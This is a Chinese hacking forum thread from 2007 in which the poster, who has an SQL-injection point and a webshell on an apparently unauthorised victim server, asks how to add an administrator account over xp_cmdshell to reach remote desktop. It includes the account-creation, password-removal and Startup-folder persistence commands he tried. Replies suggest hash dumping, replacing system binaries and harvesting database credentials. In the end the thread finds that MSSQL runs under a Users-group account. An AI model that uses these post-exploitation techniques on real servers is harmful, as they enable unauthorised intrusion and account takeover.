[讨论]再现SA的困惑!
议题作者:hackest信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
遇到一个SA注入点,拿到了webshell
注入点可以直接执行命令
开了3389,能连接上
问题是始终加不上用户!
net user命令可以执行
net user test test /add
提示“拒绝访问”!
net user user pass
想更改用户密码或者添加用户的时候
就会提示“拒绝访问”
上传过本地的cmd.exe、net.exe、net1.exe
还试过mt.exe克隆和pspasswd.exe更改密码都无效!
因为执行上述文件都一律提示“拒绝访问”!
开始以为是那个目录没有执行权限
传到everyone完全控制的目录同样提示“拒绝访问”!
cacls.exe更改net.exe和net1.exe等文件的访问权限同样提示“拒绝访问”!
和朋友讨论过了,也是加不上用户!
始终不能登录3389,放马运行也同样提示“拒绝访问”!
小弟实在是没办法了,发帖讨论下……
还请各位大大指点一二[s:269] 可以用Gethashes.exe导出HASH,跑一下管理密码,然后登录. 呃,凡是我上传的exe都无法运行!
貌似楼上没注意到这一点哦!
能运行需要的exe问题早就解决了啦!
会提示“拒绝访问”的…… [s:270] 支持php或者aspx么?
试着用其他的马哦。。。 不会装的MCAFEE,拒绝远程运行EXE文件?
改成COM试试? 我也遇到过,估计是那个用户下没有执行权限! 用SYSTEM执行 [quote]引用第4楼b0r3d于2007-05-27 09:06发表的 :
支持php或者aspx么?
试着用其他的马哦。。。[/quote]
与用的是什么马无关吧!
不支持PHP的…… [quote]引用第5楼basiner于2007-05-27 09:08发表的 :
不会装的MCAFEE,拒绝远程运行EXE文件?
改成COM试试?[/quote]
貌似不是MCAFEE,是瑞星的呢,改成.com也是拒绝访问的!
利用xp_cmdshell扩展执行net start
已经启动以下 Windows 服务:
Application Experience Lookup Service
Application Layer Gateway Service
Automatic Updates
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
FreeHostCServer
FTP Publishing Service
Help and Support
HTTP SSL
IIS Admin Service
IPSEC Services
Logical Disk Manager
Microsoft Search
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Rising Process Communication Center
Rising RealTime Monitor
Routing and Remote Access
Secondary Logon
Security Accounts Manager
Shell Hardware Detection
Simple Mail Transfer Protocol (SMTP)
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
Windows Management Instrumentation
Windows Time
WinHTTP Web Proxy Auto-Discovery Service
Wireless Configuration
Workstation
World Wide Web Publishing Service
命令成功完成。 [quote]引用第5楼ay13y于2007-05-27 09:14发表的 :
我也遇到过,估计是那个用户下没有执行权限![/quote]
你指的是这个MSSQL用户SA被降权了? [quote]引用第6楼ttfct于2007-05-27 09:43发表的 :
用SYSTEM执行[/quote]
没看明白什么意思,说清楚点哇[s:269] who am i看一下。
有可能拒绝了system用户的访问,你可以删掉cmd.exe,net.exe../它自己会恢复的,而且权限也恢复默认了.. [s:270] [quote]引用第11楼remax于2007-05-27 09:58发表的 :
who am i看一下。
有可能拒绝了system用户的访问,你可以删掉cmd.exe,net.exe../它自己会恢复的,而且权限也恢复默认了.. [s:270][/quote]
利用xp_cmdshell扩展执行whoami
ctnt-ct17854\sqlsqlsql
s:267] [quote]引用第13楼shanker于2007-05-27 10:02发表的 :
我跟着你学技术来了,我才鸟一只,看了贴 ,不好意思不顶。[/quote]
发这类帖小心被禁言哈[s:263] 利用xp_cmdshell扩展执行cacls.exe C:\windows\system32\net.exe
C:\windows\system32\net.exe NT AUTHORITY\INTERACTIVE:R
NT AUTHORITY\SERVICE:R
NT AUTHORITY\BATCH:R
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Administrators:F 既然net user /add还有更改密码都没有权限,试试
net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了....可以试试... 可能它的MSSQL不是以system运行而是以users用户组运行的 [quote]引用第16楼cncxz于2007-05-27 10:15发表的 :
既然net user /add还有更改密码都没有权限,试试
net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了....可以试试...[/quote]
利用xp_cmdshell扩展执行net user administrator /passwordreq:no
发生系统错误 5。
拒绝访问。
也不行哦! [quote]引用第17楼jackchenlei于2007-05-27 10:15发表的 :
可能它的MSSQL不是以system运行而是以users用户组运行的[/quote]
怎么确定是不是你说的这种情况呢?[s:269]
如果真的是这样岂不是没希望了[s:267] [quote]引用第17楼jackchenlei于2007-05-27 10:15发表的 :
可能它的MSSQL不是以system运行而是以users用户组运行的[/quote]
我觉得不太可能是SA被降权了,如果是被降权了,xp_CMDshell是无法执行的......
echo可不可以用? [quote]引用第20楼cncxz于2007-05-27 10:20发表的 :
我觉得不太可能是SA被降权了,如果是被降权了,xp_CMDshell是无法执行的......
echo可不可以用?[/quote]
我也认为不是SA被降权,起码它可以调用xp_cmdshell嘛
echo貌似可以用:
利用xp_cmdshell扩展执行echo /?
显示信息,或将命令回显打开或关上。
ECHO [ON | OFF]
ECHO [message]
要显示当前回显设置,键入不带参数的 ECHO。
不过目的不是拿shell哦,shell有的了
主要是想登录3389! [quote]引用第19楼hackest于2007-05-27 10:19发表的 :
怎么确定是不是你说的这种情况呢?[s:269]
如果真的是这样岂不是没希望了[s:267][/quote]
既然可以net user 那你丢个pl.exe上去列出进程看看就知道了呀
你不是传了MT吗,用MT列进程看看把回现贴出来我看看 [quote]引用第22楼jackchenlei于2007-05-27 10:26发表的 :
既然可以net user 那你丢个pl.exe上去列出进程看看就知道了呀[/quote]
凡是我弄上去的exe都一律提示“拒绝访问”的啦
能运行我需要的exe早就解决了哦[s:267][s:270] [quote]引用第23楼hackest于2007-05-27 10:27发表的 :
凡是我弄上去的exe都一律提示“拒绝访问”的啦
能运行我需要的exe早就解决了哦[s:267][s:270][/quote]
你不是传了MT吗,用MT列进程看看把回现贴出来我看看 [quote]引用第24楼jackchenlei于2007-05-27 10:28发表的 :
你不是传了MT吗,用MT列进程看看把回现贴出来我看看[/quote]
根本无法执行起来,谈何列进程呢!
利用xp_cmdshell扩展执行C:\Documents and Settings\All Users\Documents\mt.exe
拒绝访问。 把exe文件传上去 把名字改成一个你可以用的系统内置的exe程序 然后用你的exe覆盖原来的 执行程序看一下下 [s:269] [quote]引用第25楼hackest于2007-05-27 10:30发表的 :
根本无法执行起来,谈何列进程呢!
利用xp_cmdshell扩展执行C:Documents and SettingsAll UsersDocumentsmt.exe
.......[/quote]
信任的话就把shell给我看看
QQ16933185 [quote]引用第26楼wyzhack于2007-05-27 10:30发表的 :
把exe文件传上去 把名字改成一个你可以用的系统内置的exe程序 然后用你的exe覆盖原来的 执行程序看一下下 [s:269][/quote]
c::\windows\system32目录里的文件无更改权限
也没有写权限,传不上文件……
删都删不了……[s:263] 如果echo能用的话,最古老的办法...用echo写注册表启动项,或者直接bat写进"启动"文件夹.然后试试shutdown能不能用,可以的话重启,如果shutdown也不行...D他吧... 难道所有的系统文件都在system32下? [quote]引用第29楼cncxz于2007-05-27 10:36发表的 :
如果echo能用的话,最古老的办法...用echo写注册表启动项,或者直接bat写进"启动"文件夹.然后试试shutdown能不能用,可以的话重启,如果shutdown也不行...D他吧...[/quote]
用注入工具和MSSQL上传利用工具都传不了用户的BAT文件
用echo也不能写进去:
利用xp_cmdshell扩展执行echo net user hackest hackest123 /add > C:\Documents and Settings\All Users\「开始」菜单\程序\启动\add.bat
拒绝访问。
[s:267] [quote]引用第30楼wyzhack于2007-05-27 10:40发表的 :
难道所有的系统文件都在system32下?[/quote]
不理你,静说些废话[s:265] 我注意到一个问题,之前你不是说可以传EXE吗?能确定传的EXE文件成功了吗?如果能成功上传EXE的话,传到启动里面,再重启 [quote]引用第33楼cncxz于2007-05-27 11:13发表的 :
我注意到一个问题,之前你不是说可以传EXE吗?能确定传的EXE文件成功了吗?如果能成功上传EXE的话,传到启动里面,再重启[/quote]
确定能传,但是不能传到启动里面! 郁闷了,终于知道为什么不能添加用户操作了!
1、利用xp_cmdshell扩展执行whoami
ctnt-ct17854\sqlsqlsql
2、net user sqlsqlsql
用户名 sqlsqlsql
全名 sqlsqlsql
注释 newccc
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2005-9-30 16:18
密码到期 从不
密码可更改 2005-9-30 16:18
需要密码 Yes
用户可以更改密码 No
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2007-5-24 3:03
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
sqlsqlsql是Users组用户,以Users组用户启动的MSSQL!难怪没权限!
[s:267] 为什么能有xp_cmdshell的权限? xp_cmdshell是mssql的一个扩展, 默认只有sa能调用
但是调用了xp_cmdshell也不是说就一定能执行系统命令的哦 [s:269] [quote]引用第36楼cncxz于2007-05-27 11:40发表的 :
为什么能有xp_cmdshell的权限?[/quote]
你建立一个USERS用户一样可以NET USER呀,但系统命令就。。。。。。。。。 换句话说就是SA的注入点的最高权只能是user!
本身user就不具备添加用户这类system或administrator权限才能办到的事情嘛 找找有没有可替换的文件呢?
[s:289] 不用这样做,我只是想弄弄明白为什么不能实现而已
现在目的达到了,放他一马,不搞他了,嘿嘿 其实上边有人说对了的,
不过,你是怎么确实他是以user组启动mssql 的? [s:270] whoami得出用户为sqlsqlsql
net user sqlsqlsql确定sqlsqlsql这个用户属于users组
这样还不够清楚哈 [s:263] 可以结帖了....看来我之前是有点把sql跟system的权限搞混了. 我还不知道具体怎么把mssql以user权限启动,本机测试过几次没成功。
哪位大大知道,请赐教!
这贴有价值 [s:281] 楼主遇到的问题还真是严重...。。。。
我碰到的用net user 是无法找到文件。。但是可以用net view。。 [quote]引用第45楼唐不狐于2007-05-27 15:11发表的 :
我还不知道具体怎么把mssql以user权限启动,本机测试过几次没成功。
哪位大大知道,请赐教!
这贴有价值[/quote]
建一个普通用户
以普通用户的身份启动MSSQL
不知道是不是这样[s:269] [quote]引用第46楼greyair于2007-05-27 15:13发表的 :
[s:281] 楼主遇到的问题还真是严重...。。。。
我碰到的用net user 是无法找到文件。。但是可以用net view。。[/quote]
能自己传一个来用么[s:263] MSSQL的sa在某些环境下 不一定代表system权限。。
xp_cmdshell 执行权限 与MSSQL的运行用户的权限有关。
就像X楼(忘记几楼)讲的,也许是MSSQL被降权了。
这是很容易办到的。
在企业管理器里可以改,在系统服务那里也可以改。 我在想既然是sa在连接数据库,应该能找到他的数据库的连接文件吧?去找下账户密码。再用sqltools连上去咯。 [s:263]
页:
[1]
2